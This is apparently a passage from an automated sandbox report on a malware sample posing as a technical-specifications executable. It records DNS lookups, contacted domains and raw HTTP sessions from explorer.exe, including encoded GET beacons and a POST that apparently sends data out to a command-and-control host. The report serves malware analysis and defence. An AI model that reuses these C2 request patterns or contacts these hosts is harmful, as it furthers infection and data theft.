                                                Aug 8, 2022 12:29:01.681569099 CEST192.168.2.38.8.8.80x7af8Standard query (0)www.mexc-event-partner.siteA (IP address)IN (0x0001)
                                                Aug 8, 2022 12:29:07.523072958 CEST192.168.2.38.8.8.80x6d06Standard query (0)www.gzkanglongkeji.comA (IP address)IN (0x0001)
                                                Aug 8, 2022 12:29:08.532000065 CEST192.168.2.38.8.8.80x6d06Standard query (0)www.gzkanglongkeji.comA (IP address)IN (0x0001)
                                                Aug 8, 2022 12:29:09.578977108 CEST192.168.2.38.8.8.80x6d06Standard query (0)www.gzkanglongkeji.comA (IP address)IN (0x0001)
                                                Aug 8, 2022 12:29:11.663458109 CEST192.168.2.38.8.8.80x6d06Standard query (0)www.gzkanglongkeji.comA (IP address)IN (0x0001)
                                                Aug 8, 2022 12:29:12.571427107 CEST192.168.2.38.8.8.80x4d10Standard query (0)www.gzkanglongkeji.comA (IP address)IN (0x0001)
                                                Aug 8, 2022 12:29:13.579313993 CEST192.168.2.38.8.8.80x4d10Standard query (0)www.gzkanglongkeji.comA (IP address)IN (0x0001)
                                                Aug 8, 2022 12:29:14.594968081 CEST192.168.2.38.8.8.80x4d10Standard query (0)www.gzkanglongkeji.comA (IP address)IN (0x0001)
                                                Aug 8, 2022 12:29:16.610747099 CEST192.168.2.38.8.8.80x4d10Standard query (0)www.gzkanglongkeji.comA (IP address)IN (0x0001)
                                                Aug 8, 2022 12:29:22.596843958 CEST192.168.2.38.8.8.80xdf98Standard query (0)www.fundycases.comA (IP address)IN (0x0001)

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                Aug 8, 2022 12:28:32.449382067 CEST8.8.8.8192.168.2.30x260eNo error (0)www.kirchhoff-darryl.com107.155.208.43A (IP address)IN (0x0001)
                                                Aug 8, 2022 12:28:38.334137917 CEST8.8.8.8192.168.2.30x93aeNo error (0)www.tomoptique.frtomoptique.frCNAME (Canonical name)IN (0x0001)
                                                Aug 8, 2022 12:28:38.334137917 CEST8.8.8.8192.168.2.30x93aeNo error (0)tomoptique.fr109.234.162.62A (IP address)IN (0x0001)
                                                Aug 8, 2022 12:28:44.018109083 CEST8.8.8.8192.168.2.30xd4b1No error (0)www.boshi-eg.onlineboshi-eg.onlineCNAME (Canonical name)IN (0x0001)
                                                Aug 8, 2022 12:28:44.018109083 CEST8.8.8.8192.168.2.30xd4b1No error (0)boshi-eg.online67.23.226.119A (IP address)IN (0x0001)
                                                Aug 8, 2022 12:28:49.456350088 CEST8.8.8.8192.168.2.30x603No error (0)www.esandcraic.com67.223.117.72A (IP address)IN (0x0001)
                                                Aug 8, 2022 12:29:01.719481945 CEST8.8.8.8192.168.2.30x7af8No error (0)www.mexc-event-partner.sitemexc-event-partner.siteCNAME (Canonical name)IN (0x0001)
                                                Aug 8, 2022 12:29:01.719481945 CEST8.8.8.8192.168.2.30x7af8No error (0)mexc-event-partner.site184.168.107.80A (IP address)IN (0x0001)
                                                Aug 8, 2022 12:29:12.542298079 CEST8.8.8.8192.168.2.30x6d06Server failure (2)www.gzkanglongkeji.comnonenoneA (IP address)IN (0x0001)
                                                Aug 8, 2022 12:29:13.551590919 CEST8.8.8.8192.168.2.30x6d06Server failure (2)www.gzkanglongkeji.comnonenoneA (IP address)IN (0x0001)
                                                Aug 8, 2022 12:29:14.598031998 CEST8.8.8.8192.168.2.30x6d06Server failure (2)www.gzkanglongkeji.comnonenoneA (IP address)IN (0x0001)
                                                Aug 8, 2022 12:29:16.682765961 CEST8.8.8.8192.168.2.30x6d06Server failure (2)www.gzkanglongkeji.comnonenoneA (IP address)IN (0x0001)
                                                Aug 8, 2022 12:29:17.592346907 CEST8.8.8.8192.168.2.30x4d10Server failure (2)www.gzkanglongkeji.comnonenoneA (IP address)IN (0x0001)
                                                Aug 8, 2022 12:29:18.598768950 CEST8.8.8.8192.168.2.30x4d10Server failure (2)www.gzkanglongkeji.comnonenoneA (IP address)IN (0x0001)
                                                Aug 8, 2022 12:29:19.614202976 CEST8.8.8.8192.168.2.30x4d10Server failure (2)www.gzkanglongkeji.comnonenoneA (IP address)IN (0x0001)
                                                Aug 8, 2022 12:29:21.629395008 CEST8.8.8.8192.168.2.30x4d10Server failure (2)www.gzkanglongkeji.comnonenoneA (IP address)IN (0x0001)
                                                Aug 8, 2022 12:29:22.630506992 CEST8.8.8.8192.168.2.30xdf98No error (0)www.fundycases.comgcdn0.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                Aug 8, 2022 12:29:22.630506992 CEST8.8.8.8192.168.2.30xdf98No error (0)gcdn0.wixdns.netbalancer.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                Aug 8, 2022 12:29:22.630506992 CEST8.8.8.8192.168.2.30xdf98No error (0)balancer.wixdns.net5f36b111-balancer.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                Aug 8, 2022 12:29:22.630506992 CEST8.8.8.8192.168.2.30xdf98No error (0)5f36b111-balancer.wixdns.nettd-balancer-199-15-163-148.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                Aug 8, 2022 12:29:22.630506992 CEST8.8.8.8192.168.2.30xdf98No error (0)td-balancer-199-15-163-148.wixdns.net199.15.163.148A (IP address)IN (0x0001)

                                                HTTP Request Dependency Graph

                                                • www.kirchhoff-darryl.com
                                                • www.tomoptique.fr
                                                • www.boshi-eg.online
                                                • www.esandcraic.com
                                                • www.mexc-event-partner.site

                                                HTTP Packets

                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                0192.168.2.349776107.155.208.4380C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Aug 8, 2022 12:28:32.786432028 CEST7566OUTGET /02pi/?ZL0=JO9pwDAFX0pE08ZhB6JsQfIKbq32cMNHUs94bAK91+KgqpPGSJqKC7J3zS0r1gze3M+2qFZl2NsX2aSbasAE+ZE0SL8u6zgnew==&wRtdp=ETVPg0_ HTTP/1.1
                                                Host: www.kirchhoff-darryl.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Aug 8, 2022 12:28:33.078955889 CEST7566INHTTP/1.1 301 Moved Permanently
                                                Date: Mon, 08 Aug 2022 10:28:32 GMT
                                                Server: Apache/2.2.15 (CentOS)
                                                Location: http://www.kirchhoff-darryl.com/02pi?ZL0=JO9pwDAFX0pE08ZhB6JsQfIKbq32cMNHUs94bAK91+KgqpPGSJqKC7J3zS0r1gze3M+2qFZl2NsX2aSbasAE+ZE0SL8u6zgnew==&wRtdp=ETVPg0_
                                                Content-Length: 457
                                                Connection: close
                                                Content-Type: text/html; charset=iso-8859-1
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6b 69 72 63 68 68 6f 66 66 2d 64 61 72 72 79 6c 2e 63 6f 6d 2f 30 32 70 69 3f 5a 4c 30 3d 4a 4f 39 70 77 44 41 46 58 30 70 45 30 38 5a 68 42 36 4a 73 51 66 49 4b 62 71 33 32 63 4d 4e 48 55 73 39 34 62 41 4b 39 31 2b 4b 67 71 70 50 47 53 4a 71 4b 43 37 4a 33 7a 53 30 72 31 67 7a 65 33 4d 2b 32 71 46 5a 6c 32 4e 73 58 32 61 53 62 61 73 41 45 2b 5a 45 30 53 4c 38 75 36 7a 67 6e 65 77 3d 3d 26 61 6d 70 3b 77 52 74 64 70 3d 45 54 56 50 67 30 5f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 31 35 20 28 43 65 6e 74 4f 53 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6b 69 72 63 68 68 6f 66 66 2d 64 61 72 72 79 6c 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.kirchhoff-darryl.com/02pi?ZL0=JO9pwDAFX0pE08ZhB6JsQfIKbq32cMNHUs94bAK91+KgqpPGSJqKC7J3zS0r1gze3M+2qFZl2NsX2aSbasAE+ZE0SL8u6zgnew==&amp;wRtdp=ETVPg0_">here</a>.</p><hr><address>Apache/2.2.15 (CentOS) Server at www.kirchhoff-darryl.com Port 80</address></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                1192.168.2.349780109.234.162.6280C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Aug 8, 2022 12:28:38.365463018 CEST7583OUTGET /02pi/?ZL0=thvfohwi7xD8LUPTC+PvURbDlMdrWv6G+kdQz5W5EjaeNcjaAM/7YzWabXa+Emqnmxa+j2rvyn8aQKdomTvD7NHn7LH6m5q/aw==&wRtdp=ETVPg0_ HTTP/1.1
                                                Host: www.tomoptique.fr
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Aug 8, 2022 12:28:38.864422083 CEST7587INHTTP/1.1 301 Moved Permanently
                                                Date: Mon, 08 Aug 2022 10:28:38 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Content-Length: 0
                                                Connection: close
                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                X-Redirect-By: WordPress
                                                Location: http://tomoptique.fr/02pi/?ZL0=thvfohwi7xD8LUPTC+PvURbDlMdrWv6G+kdQz5W5EjaeNcjaAM/7YzWabXa+Emqnmxa+j2rvyn8aQKdomTvD7NHn7LH6m5q/aw==&wRtdp=ETVPg0_
                                                Server: o2switch-PowerBoost-v3


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                2192.168.2.34980367.23.226.11980C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Aug 8, 2022 12:28:44.161489964 CEST7676OUTGET /02pi/?ZL0=4npjF3s9G6uWNp4ceBGqcNUcjkX96JEG8J4d3OAuWw45Kxpl9gSb2BHY5Eg4Nc6InaukRaYVJuT4y0aleUHPUlqgoOBFmRDZHQ==&wRtdp=ETVPg0_ HTTP/1.1
                                                Host: www.boshi-eg.online
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Aug 8, 2022 12:28:44.300245047 CEST7677INHTTP/1.1 404 Not Found
                                                Date: Mon, 08 Aug 2022 10:28:44 GMT
                                                Server: Apache
                                                Content-Length: 315
                                                Connection: close
                                                Content-Type: text/html; charset=iso-8859-1
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                3192.168.2.34980967.223.117.7280C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Aug 8, 2022 12:28:49.631207943 CEST7769OUTGET /02pi/?ZL0=H3j/zDn1cik0H8aEc4JTyOZmy0u09IlpCgxUGgbrjIcqKZuTm1TQkyEN0mTnJzpMGdd8V9PF4iBs4MdYqflf8PDJEP40yO/f8Q==&wRtdp=ETVPg0_ HTTP/1.1
                                                Host: www.esandcraic.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Aug 8, 2022 12:28:49.902386904 CEST7770INHTTP/1.1 404 Not Found
                                                Date: Mon, 08 Aug 2022 10:28:49 GMT
                                                Server: Apache
                                                Content-Length: 5278
                                                Connection: close
                                                Content-Type: text/html; charset=iso-8859-1
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 32 30 30 2c 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 73 76 67 20 69 64 3d 22 73 76 67 57 72 61 70 5f 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 3d 22 30 70 78 22 20 79 3d 22 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 30 30 20 32 35 30 22 3e 0a 20 20 3c 67 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 33 5f 32 22 20 64 3d 22 4d 31 39 35 2e 37 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 32 37 2e 37 36 63 2d 32 2e 36 34 20 30 2d 35 2e 31 2d 2e 35 2d 37 2e 33 36 2d 31 2e 34 39 2d 32 2e 32 37 2d 2e 39 39 2d 34 2e 32 33 2d 32 2e 33 31 2d 35 2e 38 38 2d 33 2e 39 36 2d 31 2e 36 35 2d 31 2e 36 35 2d 32 2e 39 35 2d 33 2e 36 31 2d 33 2e 38 39 2d 35 2e 38 38 73 2d 31 2e 34 32 2d 34 2e 36 37 2d 31 2e 34 32 2d 37 2e 32 32 56 32 39 2e 36 32 68 33 36 2e 38 32 76 38 32 2e 39 38 48 31 35 38 2e 36 56 32 39 2e 36 32 68 33 37 2e 31 76 32 30 33 2e 30 35 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 32 5f 32 22 20 64 3d 22 4d 34 37 30 2e 36 39 20 31 34 37 2e 37 31 63 30 20 38 2e 33 31 2d 31 2e 30 36 20 31 36 2e 31 37 2d 33 2e 31 39 20 32 33 2e 35 38 2d 32 2e 31 32 20 37 2e 34 31 2d 35 2e 31 32 20 31 34 2e 32 38 2d 38 2e 39 39 20 32 30 2e 36 2d 33 2e 38 37 20 36 2e 33 33 2d 38 2e 34 35 20 31 31 2e 39 39 2d 31 33 2e 37 34 20 31 36 2e 39 39 2d 35 2e 32 39 20 35 2d 31 31 2e 30 37 20 39 2e 32 38 2d 31 37 2e 33 35 20 31 32 2e 38 31 61 38 35 2e 31 34 36 20 38 35 2e 31 34 36 20 30 20 30 20 31 2d 32 30 2e 30 34 20 38 2e 31 34 20 38 33 2e 36 33 37 20 38 33 2e 36 33 37 20 30 20 30 20 31 2d 32 31 2e 36 37 20 32 2e 38 33 48 33 31 39 2e 33 63 2d 37 2e 34 36 20 30 2d 31 34 2e 37 33 2d 2e 39 34 2d 32 31 2e 38 31 2d 32 2e 38 33 2d 37 2e 30 38 2d 31 2e 38 39 2d 31 33 2e 37 36 2d 34 2e 36 2d 32 30 2e 30 34 2d 38 2e 31 34 61 38 38 2e 32 39 32 20 38 38 2e 32 39 32 20 30 20 30 20 31 2d 31 37 2e 33 35 2d 31 32 2e 38 31 63 2d 35 2e 32 39 2d 35 2d 39 2e 38 34 2d 31 30 2e 36 37 2d 31 33 2e 36 36 2d 31 36 2e 39 39 2d 33 2e 38 32 2d 36 2e 33 32 2d 36 2e 38 2d 31 33 2e 31 39 2d 38 2e 39 32 2d 32 30 2e 36 2d 32 2e 31 32 2d 37 2e 34 31 2d 33 2e 31 39 2d 31 35 2e 32 37 2d 33 2e 31 39 2d 32 33 2e 35 38 76 2d 33 33 2e 31 33 63 30 2d 31 32 2e 34 36 20 32 2e 33 34 2d 32 33 2e 38 38 20 37 2e 30 31 2d 33 34 2e 32 37 20 34 2e 36 37
                                                Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Montserrat:200,400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div></div><svg id="svgWrap_2" xmlns="http://www.w3.org/2000/svg" x="0px" y="0px" viewBox="0 0 700 250"> <g> <path id="id3_2" d="M195.7 232.67h-37.1V149.7H27.76c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98H158.6V29.62h37.1v203.05z"/> <path id="id2_2" d="M470.69 147.71c0 8.31-1.06 16.17-3.19 23.58-2.12 7.41-5.12 14.28-8.99 20.6-3.87 6.33-8.45 11.99-13.74 16.99-5.29 5-11.07 9.28-17.35 12.81a85.146 85.146 0 0 1-20.04 8.14 83.637 83.637 0 0 1-21.67 2.83H319.3c-7.46 0-14.73-.94-21.81-2.83-7.08-1.89-13.76-4.6-20.04-8.14a88.292 88.292 0 0 1-17.35-12.81c-5.29-5-9.84-10.67-13.66-16.99-3.82-6.32-6.8-13.19-8.92-20.6-2.12-7.41-3.19-15.27-3.19-23.58v-33.13c0-12.46 2.34-23.88 7.01-34.27 4.67


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                4192.168.2.349817184.168.107.8080C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Aug 8, 2022 12:29:01.972229004 CEST8097OUTPOST /02pi/ HTTP/1.1
                                                Host: www.mexc-event-partner.site
                                                Connection: close
                                                Content-Length: 409
                                                Cache-Control: no-cache
                                                Origin: http://www.mexc-event-partner.site
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Content-Type: application/x-www-form-urlencoded
                                                Accept: */*
                                                Referer: http://www.mexc-event-partner.site/02pi/
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate
                                                Data Raw: 5a 4c 30 3d 44 76 79 6b 59 68 57 49 4d 35 4c 42 4a 6a 4d 50 6a 54 75 63 62 57 6d 55 44 47 6a 73 66 32 46 4f 72 53 64 48 57 70 34 47 61 33 74 68 66 6a 38 75 79 5f 54 78 59 47 53 44 75 33 62 4c 39 42 7a 62 39 47 57 70 74 79 46 63 62 75 70 69 6f 68 6f 32 6d 5a 51 56 77 5a 7e 45 62 35 42 51 71 64 43 78 66 72 6f 78 42 49 62 70 39 44 47 75 43 31 5a 30 69 52 7a 49 4d 53 7a 7a 32 78 43 77 6d 76 61 52 4e 31 7a 49 62 44 50 49 4d 5f 62 72 31 33 36 6b 6d 7a 39 35 4e 67 61 62 55 51 4a 31 6b 50 63 62 41 55 71 63 37 55 45 52 32 73 48 51 55 66 46 65 5a 46 4f 7a 35 4e 4e 35 7a 68 6b 4a 6b 50 6b 35 57 53 37 6a 28 47 52 42 41 71 49 7a 64 74 78 42 54 72 46 39 36 4c 77 2d 57 32 63 52 66 32 63 57 74 31 28 5f 4b 43 54 63 65 35 74 43 76 64 59 53 45 5f 6f 36 59 31 59 2d 41 79 45 43 4f 36 6e 73 66 6e 71 72 39 4d 35 34 6d 44 79 6f 39 47 71 66 4f 48 6c 58 37 74 41 41 7a 32 51 4a 71 51 41 63 33 52 49 4f 45 2d 42 64 71 4a 48 6c 69 37 6b 68 41 6c 45 4f 6d 68 6a 72 35 37 6b 71 6e 4e 55 6f 6e 4e 66 4f 51 70 48 43 58 79 67 71 66 58 67 68 77 34 71 52 56 47 6c 61 38 50 50 57 5a 63 4c 6c 7e 38 65 44 72 52 57 79 48 4a 59 70 30 53 4a 41 56 59 6c 76 6d 33 33 33 6c 6f 4f 2d 6b 6b 54 2d 63 69 57 52 79 36 54 35 7a 51 79 71 52 6f 44 4c 6d 41 29 2e 00 00 00 00 00 00 00 00
                                                Data Ascii: ZL0=DvykYhWIM5LBJjMPjTucbWmUDGjsf2FOrSdHWp4Ga3thfj8uy_TxYGSDu3bL9Bzb9GWptyFcbupioho2mZQVwZ~Eb5BQqdCxfroxBIbp9DGuC1Z0iRzIMSzz2xCwmvaRN1zIbDPIM_br136kmz95NgabUQJ1kPcbAUqc7UER2sHQUfFeZFOz5NN5zhkJkPk5WS7j(GRBAqIzdtxBTrF96Lw-W2cRf2cWt1(_KCTce5tCvdYSE_o6Y1Y-AyECO6nsfnqr9M54mDyo9GqfOHlX7tAAz2QJqQAc3RIOE-BdqJHli7khAlEOmhjr57kqnNUonNfOQpHCXygqfXghw4qRVGla8PPWZcLl~8eDrRWyHJYp0SJAVYlvm333loO-kkT-ciWRy6T5zQyqRoDLmA).
                                                Aug 8, 2022 12:29:02.232486010 CEST8099INHTTP/1.1 404 Not Found
                                                Date: Mon, 08 Aug 2022 10:29:02 GMT
                                                Server: Apache
                                                Content-Length: 315
                                                Connection: close
                                                Content-Type: text/html; charset=iso-8859-1
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                5192.168.2.349818184.168.107.8080C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Aug 8, 2022 12:29:02.227710009 CEST8098OUTGET /02pi/?ZL0=OtaEbXX4ObCoLhtF/lWLZX2dLDLBfFgcjwhWC5AcKk5LEysMwPLPLl+t4RfX0ATi8hGNnWUlfKNR4DoGgewcnJOxYMoo89i/Ow==&wRtdp=ETVPg0_ HTTP/1.1
                                                Host: www.mexc-event-partner.site
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Aug 8, 2022 12:29:02.489057064 CEST8100INHTTP/1.1 404 Not Found
                                                Date: Mon, 08 Aug 2022 10:29:02 GMT
                                                Server: Apache
                                                Content-Length: 315
                                                Connection: close
                                                Content-Type: text/html; charset=iso-8859-1
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                Statistics

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                General

                                                Target ID:0
                                                Start time:12:27:07
                                                Start date:08/08/2022
                                                Path:C:\Users\user\Desktop\Technical Specifications & Drawings.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\Technical Specifications & Drawings.exe"
                                                Imagebase:0x400000
                                                File size:800256 bytes
                                                MD5 hash:9B94F751E8CC145058DB9F428C2AD571
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET
                                                Yara matches:
